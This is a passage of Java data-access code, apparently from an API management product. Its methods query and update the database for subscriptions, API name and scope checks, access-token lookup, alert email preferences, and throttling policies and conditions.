deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Delete subscription based on API_PRODUCT_ID, APP_ID * * @param apiProductId - subscriber API_PRODUCT_ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiProductIDAndAppID(int apiProductId, int appId, Connection conn) throws SQLException { String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_AND_PRODUCT_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiProductId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Check the given api name is already available in the api table under given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if the name is already available * @throws APIManagementException */ public boolean isApiNameExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check api Name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether another API with a different letter case of the given api name is already available in the api * table under the given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if a different letter case name is already available * @throws APIManagementException If failed to check different letter case api name availability */ public boolean isApiNameWithDifferentCaseExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_DIFF_CASE_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_DIFF_CASE_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); prepStmt.setString(3, apiName); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check different letter case api name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public Set<String> getActiveTokensOfConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKEN_OF_CONSUMER_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens for consumerKey " + consumerKey, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of consumerKey " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } /** * Check the given scope key is already available under given tenant * * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException */ public boolean isScopeKeyExist(String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String query = SQLConstants.GET_SCOPE_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); int scopeCount = 0; if (resultSet != null) { while (resultSet.next()) { scopeCount = resultSet.getInt("SCOPE_COUNT"); } } if (scopeCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether the given scope key is already assigned to another API than given under given tenant * * @param identifier API Identifier * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException if failed to check the context availability */ public boolean isScopeKeyAssigned(APIIdentifier identifier, String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement prepStmt2 = null; ResultSet resultSet = null; ResultSet resultSet2 = null; String apiScopeQuery = SQLConstants.GET_API_SCOPE_SQL; String getApiQuery = SQLConstants.GET_API_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(apiScopeQuery); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); if (resultSet != null && resultSet.next()) { int apiID = resultSet.getInt("API_ID"); String provider = resultSet.getString("API_PROVIDER"); String apiName = resultSet.getString("API_NAME"); prepStmt2 = connection.prepareStatement(getApiQuery); prepStmt2.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt2.setString(2, identifier.getApiName()); prepStmt2.setString(3, identifier.getVersion()); resultSet2 = prepStmt2.executeQuery(); if (resultSet2 != null && resultSet2.next()) { //If the API ID is different from the one being saved if (apiID != resultSet2.getInt("API_ID")) { //Check if the provider name and api name is same. if (provider.equals(APIUtil.replaceEmailDomainBack(identifier.getProviderName())) && apiName .equals(identifier.getApiName())) { //Return false since this means we're attaching the scope to another version of the API. return false; } return true; } else { return false; } } } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt2, null, resultSet2); APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public boolean isDuplicateContextTemplate(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_CONTEXT_TEMPLATE_COUNT_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); if (resultSet.next()) { int count = resultSet.getInt("CTX_COUNT"); return count > 0; } } catch (SQLException e) { handleException("Failed to count contexts which match " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * retrieve list of API names which matches given context * * @param contextTemplate context template * @return list of API names * @throws APIManagementException */ public List<String> getAPINamesMatchingContext(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> nameList = new ArrayList<String>(); String sqlQuery = SQLConstants.GET_API_NAMES_MATCHES_CONTEXT; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); while (resultSet.next()) { nameList.add(resultSet.getString("API_NAME")); } } catch (SQLException e) { handleException("Failed to get API names matches context " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return nameList; } /** * @param consumerKey * @return */ public boolean isMappingExistsforConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_APPLICATION_MAPPING_FOR_CONSUMER_KEY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); // We only expect one result. if (resultSet.next()) { String applicationId = resultSet.getString("APPLICATION_ID"); return (applicationId != null && !applicationId.isEmpty()); } } catch (SQLException e) { handleException("Failed to get Application ID by consumerKey ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * @param applicationId * @param keyType * @return */ public String getConsumerkeyByApplicationIdAndKeyType(String applicationId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String consumerKey = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_CONSUMER_KEY_BY_APPLICATION_AND_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { consumerKey = resultSet.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Failed to get consumer key by applicationId " + applicationId + "and keyType " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return consumerKey; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public String getLastPublishedAPIVersionFromAPIStore(APIIdentifier apiIdentifier, String storeName) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Connection conn = null; String version = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_LAST_PUBLISHED_API_VERSION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiIdentifier.getProviderName()); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, storeName); rs = ps.executeQuery(); while (rs.next()) { version = rs.getString("API_VERSION"); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return version; } private String getScopeString(List<String> scopes) { return StringUtils.join(scopes, " "); } /** * Find all active access tokens of a given user. * * @param username - Username of the user * @return - The set of active access tokens of the user. */ public Set<String> getActiveAccessTokensOfUser(String username) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); int tenantId = IdentityTenantUtil.getTenantIdOfUser(username); String userStoreDomain = IdentityUtil.extractDomainFromName(username).toUpperCase(); if (StringUtils.isEmpty(userStoreDomain)) { userStoreDomain = IdentityUtil.getPrimaryDomainName(); } else { //IdentityUtil doesn't have a function to remove the domain name from the username. Using the UserCoreUtil. username = UserCoreUtil.removeDomainFromName(username); } try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKENS_OF_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACTIVE_TOKENS_OF_USER_SUFFIX; ps = conn.prepareStatement(sqlQuery); ps.setString(1, MultitenantUtils.getTenantAwareUsername(username)); ps.setInt(2, tenantId); ps.setString(3, userStoreDomain.toLowerCase()); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens of user " + username, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of user " + username, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } // public TokenGenerator getTokenGenerator() { // return tokenGenerator; // } private String getAccessTokenStoreTableNameOfUserId(String userId, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromUserId(userId); } return accessTokenStoreTable; } private String getAccessTokenStoreTableFromAccessToken(String accessToken, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); } return accessTokenStoreTable; } /** * This method will fetch all alerts type that is available in AM_ALERT_TYPES. * * @param stakeHolder the name of the stakeholder. whether its "subscriber", "publisher" or * "admin-dashboard" * @return List of alert types * @throws APIManagementException */ public HashMap<Integer, String> getAllAlertTypesByStakeHolder(String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, String> map = new HashMap<Integer, String>(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery; if (stakeHolder.equals("admin-dashboard")) { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES_FOR_ADMIN; ps = conn.prepareStatement(sqlQuery); } else { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES; ps = conn.prepareStatement(sqlQuery); ps.setString(1, stakeHolder); } resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getInt(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve alert types ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } /** * @param userName user name with tenant domain ex: [email protected] * @param stakeHolder value "p" for publisher value "s" for subscriber value "a" for admin * @return map of saved values of alert types. * @throws APIManagementException */ public List<Integer> getSavedAlertTypesIdsByUserNameAndStakeHolder(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> list = new ArrayList<Integer>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_TYPES_BY_USERNAME; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getInt(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will retrieve saved emails list by user name and stakeholder. * * @param userName user name. * @param stakeHolder "publisher" , "subscriber" or "admin-dashboard" * @return * @throws APIManagementException */ public List<String> retrieveSavedEmailList(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> list = new ArrayList<String>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_EMAILS; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getString(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will delete all email alert subscriptions details from tables * * @param userName * @param agent whether its publisher or store or admin dash board. */ public void unSubscribeAlerts(String userName, String agent) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { connection.setAutoCommit(false); String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); ps.executeUpdate(); String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); } connection.commit(); } catch (SQLException e) { handleException("Failed to delete alert email data.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * @param userName User name. * @param emailList Comma separated email list. * @param alertTypesIDList Comma separated alert types list. * @param stakeHolder if pram value = p we assume those changes from publisher if param value = s those data belongs to * subscriber. * @throws APIManagementException * @throws SQLException */ public void addAlertTypesConfigInfo(String userName, String emailList, String alertTypesIDList, String stakeHolder) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.executeUpdate(); if (!StringUtils.isEmpty(alertTypesIDList)) { List<String> alertTypeIdList = Arrays.asList(alertTypesIDList.split(",")); for (String alertTypeId : alertTypeIdList) { PreparedStatement psAlertTypeId = null; try { psAlertTypeId = connection.prepareStatement(alertTypesQuery); psAlertTypeId.setInt(1, Integer.parseInt(alertTypeId)); psAlertTypeId.setString(2, userName); psAlertTypeId.setString(3, stakeHolder); psAlertTypeId.execute(); } catch (SQLException e) { handleException("Error while adding alert types", e); } finally { APIMgtDBUtil.closeAllConnections(psAlertTypeId, null, null); } } } String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement extractedEmailListPs = null; try { extractedEmailListPs = connection.prepareStatement(saveEmailListDetailsQuery); extractedEmailListPs.setInt(1, emailListId); extractedEmailListPs.setString(2, email); extractedEmailListPs.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(extractedEmailListPs, null, null); } } } } else { String emailListSaveQuery = SQLConstants.ADD_ALERT_EMAIL_LIST; String dbProductName = connection.getMetaData().getDatabaseProductName(); ps = connection.prepareStatement(emailListSaveQuery, new String[]{DBUtils. getConvertedAutoGeneratedColumnName(dbProductName, "EMAIL_LIST_ID")}); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int generatedEmailIdList = rs.getInt(1); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement elseExtractedEmailListPS = null; try { elseExtractedEmailListPS = connection.prepareStatement(saveEmailListDetailsQuery); elseExtractedEmailListPS.setInt(1, generatedEmailIdList); elseExtractedEmailListPS.setString(2, email); elseExtractedEmailListPS.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(elseExtractedEmailListPS, null, null); } } } } } connection.commit(); } catch (SQLException e) { handleException("Failed to save alert preferences", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * Add a Application level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_APPLICATION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); if (hasCustomAttrib) { policyStatement.setBlob(12, new ByteArrayInputStream(policy.getCustomAttributes())); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Application Policy: " + policy.toString(), ex); } } handleException("Failed to add Application Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Add a Subscription level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setInt(12, policy.getRateLimitCount()); policyStatement.setString(13, policy.getRateLimitTimeUnit()); policyStatement.setBoolean(14, policy.isStopOnQuotaReach()); policyStatement.setString(15, policy.getBillingPlan()); if (hasCustomAttrib) { policyStatement.setBytes(16, policy.getCustomAttributes()); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Subscription Policy: " + policy.toString(), ex); } } handleException("Failed to add Subscription Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Wrapper method for {@link #addAPIPolicy(APIPolicy, Connection)} to add * API Policy without managing the database connection manually. * * @param policy policy object to add * @throws APIManagementException */ public APIPolicy addAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to add Api Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } return policy; } /** * Add a API level throttling policy to database. * <p> * If valid policy Id (not -1) is present in the <code>policy</code> object, * policy will be inserted with that policy Id. * Otherwise policy Id will be auto incremented. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void addAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_SQL; int policyId; try { String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.executeUpdate(); resultSet = policyStatement.getGeneratedKeys(); // Get the inserted POLICY_ID (auto incremented value) // Returns only single row if (resultSet.next()) { /* * H2 doesn't return generated keys when key is provided (not generated). Therefore policyId should be policy parameter's policyId when it is provided. */ policyId = resultSet.getInt(1); List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Update a API level throttling policy to database. * <p> * policy will be inserted with that policy Id. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void updateAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_WITH_ID_SQL; int policyId = policy.getPolicyId(); try { Statement st = conn.createStatement(); String driverName = conn.getMetaData().getDriverName(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY ON"); } String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.setBoolean(10, true); policyStatement.setInt(13, policyId); int updatedRawCount = policyStatement.executeUpdate(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY OFF"); } // Returns only single row if (updatedRawCount > 0) { List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Add throttling policy pipeline to database * * @param pipeline condition pipeline * @param policyID id of the policy to add pipeline * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addPipeline(Pipeline pipeline, int policyID, Connection conn) throws SQLException { PreparedStatement conditionStatement = null; ResultSet rs = null; try { String sqlAddQuery = SQLConstants.ThrottleSQLConstants.INSERT_CONDITION_GROUP_SQL; List<Condition> conditionList = pipeline.getConditions(); // Add data to the AM_CONDITION table String dbProductName = conn.getMetaData().getDatabaseProductName(); conditionStatement = conn.prepareStatement(sqlAddQuery, new String[]{DBUtils .getConvertedAutoGeneratedColumnName(dbProductName, "CONDITION_GROUP_ID")}); conditionStatement. setInt(1, policyID); conditionStatement.setString(2, pipeline.getQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(pipeline.getQuotaPolicy().getType())) { conditionStatement.setLong(3, ((RequestCountLimit) pipeline.getQuotaPolicy().getLimit()).getRequestCount()); conditionStatement.setString(4, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(pipeline.getQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) pipeline.getQuotaPolicy().getLimit(); conditionStatement.setLong(3, limit.getDataAmount()); conditionStatement.setString(4, limit.getDataUnit()); } conditionStatement.setLong(5, pipeline.getQuotaPolicy().getLimit().getUnitTime()); conditionStatement.setString(6, pipeline.getQuotaPolicy().getLimit().getTimeUnit()); conditionStatement.setString(7, pipeline.getDescription()); conditionStatement.executeUpdate(); rs = conditionStatement.getGeneratedKeys(); // Add Throttling parameters which have multiple entries if (rs != null && rs.next()) { int pipelineId = rs.getInt(1); // Get the inserted // CONDITION_GROUP_ID (auto // incremented value) pipeline.setId(pipelineId); for (Condition condition : conditionList) { if (condition == null) { continue; } String type = condition.getType(); if (PolicyConstants.IP_RANGE_TYPE.equals(type) || PolicyConstants.IP_SPECIFIC_TYPE.equals(type)) { IPCondition ipCondition = (IPCondition) condition; addIPCondition(ipCondition, pipelineId, conn); } if (PolicyConstants.HEADER_TYPE.equals(type)) { addHeaderCondition((HeaderCondition) condition, pipelineId, conn); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(type)) { addQueryParameterCondition((QueryParameterCondition) condition, pipelineId, conn); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(type)) { addJWTClaimsCondition((JWTClaimsCondition) condition, pipelineId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(conditionStatement, null, rs); } } /** * Add HEADER throttling condition to AM_HEADER_FIELD_CONDITION table * * @param headerCondition {@link HeaderCondition} with header fieled and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addHeaderCondition(HeaderCondition headerCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psHeaderCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_HEADER_FIELD_CONDITION_SQL; psHeaderCondition = conn.prepareStatement(sqlQuery); psHeaderCondition.setInt(1, pipelineId); psHeaderCondition.setString(2, headerCondition.getHeaderName()); psHeaderCondition.setString(3, headerCondition.getValue()); psHeaderCondition.setBoolean(4, headerCondition.isInvertCondition()); psHeaderCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psHeaderCondition, null, null); } } /** * Add QUERY throttling condition to AM_QUERY_PARAMETER_CONDITION table * * @param queryParameterCondition {@link QueryParameterCondition} with parameter name and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addQueryParameterCondition(QueryParameterCondition queryParameterCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psQueryParameterCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_QUERY_PARAMETER_CONDITION_SQL; psQueryParameterCondition = conn.prepareStatement(sqlQuery); psQueryParameterCondition.setInt(1, pipelineId); psQueryParameterCondition.setString(2, queryParameterCondition.getParameter()); psQueryParameterCondition.setString(3, 